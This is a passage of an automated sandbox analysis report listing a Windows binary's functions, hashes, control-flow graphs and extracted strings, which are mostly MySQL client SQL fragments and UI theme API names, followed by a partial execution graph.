                                                                        • Opcode ID: 71f79e8fd14864fee11d3caa4384dd8dbb33b3a3e7beff81a1179f76641447c9
                                                                        • Instruction ID: 13975a8f6d1ba7fd18a4ed88d3aad5e4c64ca0885491117d5e0a9905dbac9742
                                                                        • Opcode Fuzzy Hash: 71f79e8fd14864fee11d3caa4384dd8dbb33b3a3e7beff81a1179f76641447c9
                                                                        • Instruction Fuzzy Hash: 313109B5505204BBDF10DFA8DD89F9A37ECEB19364F148245BD68CB3A1D334E9808B60
                                                                        Function 00A6D0A0 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 277 a6d0a0-a6d0af 278 a6d0b7-a6d0ce 277->278 279 a6d0b1 277->279 282 a6d0d0-a6d0f4 278->282 283 a6d11d-a6d122 278->283 279->278 285 a6d0fc-a6d113 282->285
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000A6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A6B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_a6b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 994f853df20dc4413d90aa138fb5e77650c0565ae5df93b1f487cef362ebf594
                                                                        • Instruction ID: 17c69aa3bd7b9dfc68ce1b874ad95e664fb1379a8ea82c22c771a57db00ccfb2
                                                                        • Opcode Fuzzy Hash: 994f853df20dc4413d90aa138fb5e77650c0565ae5df93b1f487cef362ebf594
                                                                        • Instruction Fuzzy Hash: 9201F271B043046FE711DF69ED82E2AB7ADEBCA768B118079F50487342DAB29C019621
                                                                        Function 00A6E832 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 288 a6e832-a6e878 291 a6e87f-a6e895 call a6e7a8 288->291 292 a6e87a call a6e69c 288->292 295 a6e89a-a6e8a2 291->295 292->291 296 a6e8a4 295->296 297 a6e8ac-a6e8b0 295->297 296->297 298 a6e8b7-a6e8c8 297->298 299 a6e8b2 call a6e700 297->299 302 a6e8cf 298->302 303 a6e8ca call a6e738 298->303 299->298 303->302
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000A6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A6B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_a6b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67bb3e179648ee2f2a69155600178ec3b8de4f98b325eb2d714e5bfa4979bcb0
                                                                        • Instruction ID: 2d26de94c3c8e2dcb13c024be4af897776675a773180aa3c5323ca475934a694
                                                                        • Opcode Fuzzy Hash: 67bb3e179648ee2f2a69155600178ec3b8de4f98b325eb2d714e5bfa4979bcb0
                                                                        • Instruction Fuzzy Hash: 5C11C278A04288BFEB56EFA8C9057ACBBF2EF8A700F5484E5F400932A1E7355D91C715
                                                                        Function 00A6E834 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000A6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A6B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_a6b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ec93d004c0bdd0a4bafae682d6d39801018b28d503589a0578079de52fe586f
                                                                        • Instruction ID: c7974e6b99d84052f85ff70bca4fd8e00214fe2dd524ad78c8f0a2442bfb07d3
                                                                        • Opcode Fuzzy Hash: 4ec93d004c0bdd0a4bafae682d6d39801018b28d503589a0578079de52fe586f
                                                                        • Instruction Fuzzy Hash: E311C278A04288BFEB56EFA8C9057ACBBF2EF8A700F5484E5F400532A1D7355D91C715
                                                                        Function 00A6E7A8 Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000A6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A6B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_a6b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b489a784eb852fb59491b8817a15f788ba4ca94506ff78918a3bbf7e03d24435
                                                                        • Instruction ID: db3dc5f62c8a1144f65f0713f91b8b86b3625e8488bc4b994b5ca2d22a79e4d2
                                                                        • Opcode Fuzzy Hash: b489a784eb852fb59491b8817a15f788ba4ca94506ff78918a3bbf7e03d24435
                                                                        • Instruction Fuzzy Hash: A101D635B04504BFDB01EBA8D996F8EB7F8EB88700B524465F404D7241DB30BE008BE5
                                                                        Function 00FB67A2 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4454509843.0000000000FB6000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB6000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_fb6000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: db54f60663909a7436dcb1689bce7713d291c1ecd9984074643c8691f0b7a543
                                                                        • Instruction ID: a3499573c61ca0fd9fd247c2186e851d92e3367ac59f47b558fbfc36b3613784
                                                                        • Opcode Fuzzy Hash: db54f60663909a7436dcb1689bce7713d291c1ecd9984074643c8691f0b7a543
                                                                        • Instruction Fuzzy Hash: 62B012A47280114F2F46B03B0A1F43E700387D0705F1CE0333489D3585CC33870A3016

                                                                        Non-executed Functions

                                                                        Function 00CBBF6F Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4442189161.0000000000CBB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CBB000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_cbb000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )
                                                                        • API String ID: 0-2427484129
                                                                        • Opcode ID: ff16145018a6c5c5632cbc8a9c6fbfd71ff9ca2a68396d3093393da52bb077db
                                                                        • Instruction ID: d9afb96079c0c8970aae5b06fb0b8d9580a6304b8df3a32166fba65609cf4486
                                                                        • Opcode Fuzzy Hash: ff16145018a6c5c5632cbc8a9c6fbfd71ff9ca2a68396d3093393da52bb077db
                                                                        • Instruction Fuzzy Hash: 4221043240C3918FC708EB28E4542AEFBF0FBC1341F648A7FA4D986995D73485568F42
                                                                        Function 00BC93D0 Relevance: 60.3, Strings: 48, Instructions: 277COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundExtent$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                        • API String ID: 0-1748089680
                                                                        • Opcode ID: ac01c050939b278589bc25dd577f09dc5527cc22c560df6669efe227b43530a1
                                                                        • Instruction ID: d06bce1e430a02fe5cdf01346285dc321a66605ba30e2ffaa2988ff630ec434c
                                                                        • Opcode Fuzzy Hash: ac01c050939b278589bc25dd577f09dc5527cc22c560df6669efe227b43530a1
                                                                        • Instruction Fuzzy Hash: 34A18FB0A41791AFEF40DFB4D98AF6DB7E8EB46705780C5AAB400CF265DA749901CF12
                                                                        Function 00BA12CC Relevance: 41.5, Strings: 33, Instructions: 256COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CharacterSet$armscii8$ascii$big5$binary$cp1250$cp1251$cp1256$cp1257$cp850$cp852$cp866$dec8$euckr$gb2312$gbk$greek$hebrew$hp8$keybcs2$koi8r$koi8u$latin1$latin2$latin5$latin7$macce$macroman$sjis$swe7$tis620$ujis$utf8
                                                                        • API String ID: 0-896016262
                                                                        • Opcode ID: 4f08829629abb2c27e2582e20978b8c087ff24e4009684dfe00c6898c7568480
                                                                        • Instruction ID: aa52ac7e4c2de3baf70ba02e938c083b637a9b8a8e6054cd584f76a3a1e97681
                                                                        • Opcode Fuzzy Hash: 4f08829629abb2c27e2582e20978b8c087ff24e4009684dfe00c6898c7568480
                                                                        • Instruction Fuzzy Hash: 6691622070C28597DB90DB6ECA81BAE23E9DB9B344F7448F1D891DBF56D635CE01AB40
                                                                        Function 00B9F64E Relevance: 18.8, Strings: 15, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • SELECT CAST(NULL AS UNSIGNED) AS RECNO, ROUTINE_SCHEMA AS CATALOG_NAME, CAST(NULL AS CHAR(64)) AS SCHEMA_NAME, CAST(NULL AS CHAR(6, xrefs: 00B9F676
                                                                        • END AS PROC_SCOPE, , xrefs: 00B9F70E
                                                                        • END AS PROC_TYPE, , xrefs: 00B9F69D
                                                                        • WHEN 'PROCEDURE' THEN , xrefs: 00B9F68B
                                                                        • ORDER BY 3, 5, xrefs: 00B9F781
                                                                        • ' THEN , xrefs: 00B9F6E7
                                                                        • ROUTINE_NAME LIKE ', xrefs: 00B9F75B
                                                                        • WHEN ', xrefs: 00B9F6D1
                                                                        • LOWER(ROUTINE_SCHEMA) = LOWER(', xrefs: 00B9F731
                                                                        • WHEN 'information_schema' THEN , xrefs: 00B9F6BC
                                                                        • ELSE , xrefs: 00B9F6F9
                                                                        • WHEN 'mysql' THEN , xrefs: 00B9F6A7
                                                                        • CAST(NULL AS UNSIGNED) AS IN_PARAMS, CAST(NULL AS UNSIGNED) AS OUT_PARAMS , xrefs: 00B9F713
                                                                        • FROM INFORMATION_SCHEMA.ROUTINES, xrefs: 00B9F718
                                                                        • CASE LOWER(ROUTINE_SCHEMA) , xrefs: 00B9F6A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ELSE $ END AS PROC_SCOPE, $ END AS PROC_TYPE, $ ORDER BY 3, 5$ WHEN '$ WHEN 'PROCEDURE' THEN $ WHEN 'information_schema' THEN $' THEN $CASE LOWER(ROUTINE_SCHEMA) $CAST(NULL AS UNSIGNED) AS IN_PARAMS, CAST(NULL AS UNSIGNED) AS OUT_PARAMS $FROM INFORMATION_SCHEMA.ROUTINES$LOWER(ROUTINE_SCHEMA) = LOWER('$ROUTINE_NAME LIKE '$SELECT CAST(NULL AS UNSIGNED) AS RECNO, ROUTINE_SCHEMA AS CATALOG_NAME, CAST(NULL AS CHAR(64)) AS SCHEMA_NAME, CAST(NULL AS CHAR(6$WHEN 'mysql' THEN
                                                                        • API String ID: 0-2325421409
                                                                        • Opcode ID: 6dab2bc6d5da6a73ad59640e9d8f5abe8ca428b882acabc0a6647cb9a43284be
                                                                        • Instruction ID: c80899466e4d97d84ac84077cfde5478a3621735d6585cb0a7916417ce0ed278
                                                                        • Opcode Fuzzy Hash: 6dab2bc6d5da6a73ad59640e9d8f5abe8ca428b882acabc0a6647cb9a43284be
                                                                        • Instruction Fuzzy Hash: 0E310C34A4020AAFDF01EBD4D886FADBBF1EF49724F6084B5F400E76A2D6759E41CA51
                                                                        Function 00B9E9C0 Relevance: 17.9, Strings: 14, Instructions: 369COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: = ?$ AS $ AS RESULT$ AS RESULT, $) AS $CALL $CAST($DATE$DATETIME$DECIMAL$SELECT $SET $SIGNED$TIME
                                                                        • API String ID: 0-1103529402
                                                                        • Opcode ID: 031d01c3b9a4ed472b426979c7db7fddbd58292bdd788a338cf96dda24ce29c8
                                                                        • Instruction ID: c6a3747de4411bf2f13aa903e2e4ab725816014ceed3a9845ecdfd9a917b52a5
                                                                        • Opcode Fuzzy Hash: 031d01c3b9a4ed472b426979c7db7fddbd58292bdd788a338cf96dda24ce29c8
                                                                        • Instruction Fuzzy Hash: 86E1F835A0020D9FDF11EB94C886BEEB7F5EF88304F5080B6E461A7266D774EA45CB52
                                                                        Function 00BA41B4 Relevance: 12.9, Strings: 10, Instructions: 404COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CharacterSet$LoginTimeout$MySQL$NewPassword$Phys$ReadTimeout$SET PASSWORD = PASSWORD("$SET SQL_AUTO_IS_NULL = 0$SHOW VARIABLES LIKE 'lower_case_table_names'$WriteTimeout
                                                                        • API String ID: 0-1371362503
                                                                        • Opcode ID: bd03c08c49cb8b0884976c76826070870d2fd41e66e2ca5df20e96216e2113a1
                                                                        • Instruction ID: 932824fdeeeee0d3a201667d935819dcec82396e366922c63cdf191978fc9292
                                                                        • Opcode Fuzzy Hash: bd03c08c49cb8b0884976c76826070870d2fd41e66e2ca5df20e96216e2113a1
                                                                        • Instruction Fuzzy Hash: F3020534A08248DFDB04DBA8C985B9DB7F5FF8A300F6045F5E405AB266CBB4AE45DB50
                                                                        Function 00BA4DD8 Relevance: 10.2, Strings: 8, Instructions: 191COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Characterset name$Client info$Client version$DLL$Host info$Name modes$SSL Cipher$Server info
                                                                        • API String ID: 0-206376862
                                                                        • Opcode ID: 8e735c7f03072afa705ec3e33536aefc20438d21c4e0ef7a169531525a56b97a
                                                                        • Instruction ID: 1135bdc0a204cc9fd9efd2afe3332911bab1d48ab6a6151f879fcd79434f5707
                                                                        • Opcode Fuzzy Hash: 8e735c7f03072afa705ec3e33536aefc20438d21c4e0ef7a169531525a56b97a
                                                                        • Instruction Fuzzy Hash: EB71F774A04608DFCB20EF58C481B9DB7F1FF8A310F6181A5E954AB316D730EE458BA6
                                                                        Function 00B9DC4B Relevance: 8.8, Strings: 7, Instructions: 98COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: * 7$, INTERVAL $DATE_ADD($DAY$FRAC_SECOND$MICROSECOND$WEEK
                                                                        • API String ID: 0-521714938
                                                                        • Opcode ID: 1c3051a74d507251c0467e0cbb94195591bc0e41f1b14f0acc843e9a5b1dcc25
                                                                        • Instruction ID: 45f7daaf5970e44a5b2b63cdbdafbb6aeadfbd7b5d3aa85ef3cffd3205b7620f
                                                                        • Opcode Fuzzy Hash: 1c3051a74d507251c0467e0cbb94195591bc0e41f1b14f0acc843e9a5b1dcc25
                                                                        • Instruction Fuzzy Hash: 07410534A0011E9FCF00EB95C886E9EB7F2FF98310F6085B5E415AB269D670ED46CB52
                                                                        Function 00B9E3EC Relevance: 8.8, Strings: 7, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BEGIN$CALL$EXPLAIN$REPLACE$SHOW$START$TRANSACTION
                                                                        • API String ID: 0-931911286
                                                                        • Opcode ID: 6a8e0b554fa95ae4b62dfe58099b02627dca82cea59a1b7c06a8ba0a088330e6
                                                                        • Instruction ID: f1c56bda187078ed1ce1d888648dfb87329949496c6244411d96fed0a0528b61
                                                                        • Opcode Fuzzy Hash: 6a8e0b554fa95ae4b62dfe58099b02627dca82cea59a1b7c06a8ba0a088330e6
                                                                        • Instruction Fuzzy Hash: 6D319130B04104ABEF10EA65D585B5DBBE2EB9D314F6140F4F825AB742E934EE01D723
                                                                        Function 00BBE538 Relevance: 7.6, Strings: 6, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: bmp$emf$ico$tif$tiff$wmf
                                                                        • API String ID: 0-1495982834
                                                                        • Opcode ID: 8eae2caa70834cda04bab118bb87b94294f967b2e82a37fcabe31cb76ca2368c
                                                                        • Instruction ID: 7fb4cc19f6d21a79145fe7780e7d00719acc4f675311d85b9b5ef5a801add29f
                                                                        • Opcode Fuzzy Hash: 8eae2caa70834cda04bab118bb87b94294f967b2e82a37fcabe31cb76ca2368c
                                                                        • Instruction Fuzzy Hash: FC314A71B00604ABD705EB98DC96FEF73B6EB98700F1041A4F5119B3A2DAF4AE01C7A5
                                                                        Function 00BA53B4 Relevance: 7.6, Strings: 6, Instructions: 82COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: READ COMMITTED$READ UNCOMMITTED$REPEATABLE READ$SERIALIZABLE$SET AUTOCOMMIT = $SET SESSION TRANSACTION ISOLATION LEVEL
                                                                        • API String ID: 0-3294501522
                                                                        • Opcode ID: be554aff4b484e9e3442777c44fcecee670154aeee8a637db720b4c6064facc1
                                                                        • Instruction ID: c1184a83b4732da54b65cd83bbbbe05e83b7e783220e8ca719eeafca2b0612ec
                                                                        • Opcode Fuzzy Hash: be554aff4b484e9e3442777c44fcecee670154aeee8a637db720b4c6064facc1
                                                                        • Instruction Fuzzy Hash: 5F21B6B5A08A08DFDB14EB64C486B5E73E9EF8A301B5084F9E80197756DE34EF448A12
                                                                        Function 00B9E760 Relevance: 6.3, Strings: 5, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FOR UPDATE$FROM $LOCK IN SHARE MODE$SELECT $WHERE
                                                                        • API String ID: 0-2571452000
                                                                        • Opcode ID: a4c76fbbeea6f9eac54ca627d4999119c966dbdf9ea923ecd20f7a03361c420b
                                                                        • Instruction ID: 133491007b1d372549817692d475f2393a20a3c614df77aa27d087741f9c1fdd
                                                                        • Opcode Fuzzy Hash: a4c76fbbeea6f9eac54ca627d4999119c966dbdf9ea923ecd20f7a03361c420b
                                                                        • Instruction Fuzzy Hash: FC215071B10209ABEF05EBA4CC82E9EB7E9EB48704F4084B5F511A7352EA79D9058761
                                                                        Function 00B9DF33 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ELSE $ END$ THEN $ WHEN $CASE
                                                                        • API String ID: 0-4005974953
                                                                        • Opcode ID: bd2533e76e5fba2a69b5051497d7a937bf4c570b93a99a90b58b1d7fb2549a58
                                                                        • Instruction ID: 8d78eff98ab1a03b107bf5131f3c2027c63d23749648d3819e7d547d489f0f5e
                                                                        • Opcode Fuzzy Hash: bd2533e76e5fba2a69b5051497d7a937bf4c570b93a99a90b58b1d7fb2549a58
                                                                        • Instruction Fuzzy Hash: A921B375B041189FDF10EBA9C486F49BBE5EB89320F5680B9F945EB362D630EC419B12
                                                                        Function 00B9F3F1 Relevance: 6.3, Strings: 5, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: IN $ LIKE '$FULL $SHOW $TABLES
                                                                        • API String ID: 0-4237437289
                                                                        • Opcode ID: 85a77a033eef97421121c6d89cef06f19c11179937b7918ed4c654ebf4f32f43
                                                                        • Instruction ID: 06cb5c48012193aa519672547c3a742787ba347224cb30499f82fed404ab07e5
                                                                        • Opcode Fuzzy Hash: 85a77a033eef97421121c6d89cef06f19c11179937b7918ed4c654ebf4f32f43
                                                                        • Instruction Fuzzy Hash: 2D11D33560020AEBDF00DF94C486BAE7BE1EB88364F6080B5F844CB761C634DE81DB92
                                                                        Function 00BAACEC Relevance: 5.3, Strings: 4, Instructions: 347COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: INOUT$OUT$RETURNS$result
                                                                        • API String ID: 0-466229303
                                                                        • Opcode ID: 07c8c78b3bed52dff4a5868960543b8777414965d1671068ea3ff0a8dc37f7eb
                                                                        • Instruction ID: 9a0328f76881c0093e8ac9e6d5570e49e8c3b6ebe30a18ed7f4ba5b615d659c9
                                                                        • Opcode Fuzzy Hash: 07c8c78b3bed52dff4a5868960543b8777414965d1671068ea3ff0a8dc37f7eb
                                                                        • Instruction Fuzzy Hash: E3D17334B041198BDB10EB64C891BEEB7F5DF89300F10C5BAE995A7386DB349E46CB61
                                                                        Function 00BA114C Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Choose$ResultMode$Store$Use
                                                                        • API String ID: 0-921899505
                                                                        • Opcode ID: 7ee6cbca850c4e4e67fbf9c8b85682d11b2ad0e253d8b30fe65367767354fb49
                                                                        • Instruction ID: 2216deb5150e074a7cc820082f6b94f792c85ec684b3c78996b2ce8e4f0b9178
                                                                        • Opcode Fuzzy Hash: 7ee6cbca850c4e4e67fbf9c8b85682d11b2ad0e253d8b30fe65367767354fb49
                                                                        • Instruction Fuzzy Hash: DA01843530C3459BD741DFA9DC81B5D73EAEB8A700F6048F0EA00E7756E630DE009640
                                                                        Function 00B9DF05 Relevance: 5.0, Strings: 4, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ELSE $ END$ THEN $CASE WHEN
                                                                        • API String ID: 0-101266264
                                                                        • Opcode ID: 10febd13c96aef42730f9a900296ab6187e60375cf0863c5732a3c2d2438df5b
                                                                        • Instruction ID: 4a68989dee811e2334c8054fa2e455dd52e2067825ffd53898345bc1f9512b90
                                                                        • Opcode Fuzzy Hash: 10febd13c96aef42730f9a900296ab6187e60375cf0863c5732a3c2d2438df5b
                                                                        • Instruction Fuzzy Hash: 46E04831B44209AEEF05DBD0D803FAEBBF5E784710F6041B9B114615E1C674D845D627

                                                                        Execution Graph

                                                                        Execution Coverage:1.5%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:248
                                                                        Total number of Limit Nodes:25
                                                                        execution_graph 73417 b8f118 73420 c26710 73417->73420 73418 b8f147 73421 c2672a 73420->73421 73425 c2672f 73420->73425 73423 c26801 73421->73423 73421->73425 73424 b8f53c 3 API calls 73423->73424 73426 c26827 73424->73426 73425->73426 73427 b8f53c 73425->73427 73426->73418 73428 b8f556 73427->73428 73429 b8f5b0 73428->73429 73430 b8f5f5 73428->73430 73440 b8f739 73428->73440 73431 b8f5d9 73429->73431 73432 b8f5b5 73429->73432 73437 b8fa7b 73430->73437 73441 b8f5bb 73430->73441 73446 bdd288 GetFileVersionInfoSizeW GetFileVersionInfoW 73430->73446 73433 b8f72e 73431->73433 73431->73441 73438 b8f9ec 73432->73438 73432->73441 73434 b8acc0 3 API calls 73433->73434 73434->73440 73437->73426 73439 b8acc0 3 API calls 73438->73439 73438->73440 73439->73440 73440->73426 73441->73440 73442 b8acc0 73441->73442 73444 b8acd6 73442->73444 73443 b8aedb 73443->73440 73444->73443 73447 c29c2c 73444->73447 73446->73441 73448 c29c3b 73447->73448 73451 c27b98 73448->73451 73450 c29c4c 73450->73443 73452 c27bbc 73451->73452 73453 c27d31 73452->73453 73455 c27c7d 73452->73455 73454 c27d45 KiUserCallbackDispatcher 73453->73454 73457 c27cca 73453->73457 73454->73457 73455->73457 73458 bdd2a4 GetFileVersionInfoSizeW GetFileVersionInfoW 73455->73458 73457->73450 73458->73457 73601 c4a114 73602 c4a127 73601->73602 73604 c4a1b2 73601->73604 73603 c4a1a8 GetNativeSystemInfo 73602->73603 73602->73604 73603->73604 73459 c7aa66 73460 c7aa71 __DllMainCRTStartup@12 73459->73460 73463 c7a970 73460->73463 73462 c7aa84 73464 c7a97c __calloc_impl 73463->73464 73465 c7aa19 __calloc_impl 73464->73465 73467 c7a9c9 73464->73467 73471 c7a83b 73464->73471 73465->73462 73467->73465 73469 c7a83b ___DllMainCRTStartup 28 API calls 73467->73469 73470 c7a9f9 73467->73470 73468 c7a83b ___DllMainCRTStartup 28 API calls 73468->73465 73469->73470 73470->73465 73470->73468 73472 c7a8c6 73471->73472 73479 c7a84a ___DllMainCRTStartup 73471->73479 73473 c7a8fd 